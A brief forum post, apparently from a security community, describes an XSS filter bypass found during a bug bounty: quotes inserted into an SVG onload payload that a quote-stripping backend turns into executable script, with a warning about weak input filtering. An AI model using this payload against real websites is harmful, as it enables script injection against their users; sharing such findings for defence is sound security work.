Found an XSS bypass during a bug bounty

x32x01
  • by x32x01 ||
Found an XSS bypass during a bug bounty:
Backend was only stripping quotes ("), so payload like:
<s"vg o"nload=al"ert() />
turns into a valid:
<svg onload=alert()>
🚨 Never Rely on Poor Input Filtering !
Found an XSS bypass during a bug bounty
 
Related Threads
x32x01
Replies
0
Views
333
x32x01
x32x01
x32x01
  • x32x01
Replies
0
Views
1K
x32x01
x32x01
x32x01
Replies
0
Views
1K
x32x01
x32x01
x32x01
Replies
0
Views
331
x32x01
x32x01
x32x01
Replies
0
Views
910
x32x01
x32x01
Back
Top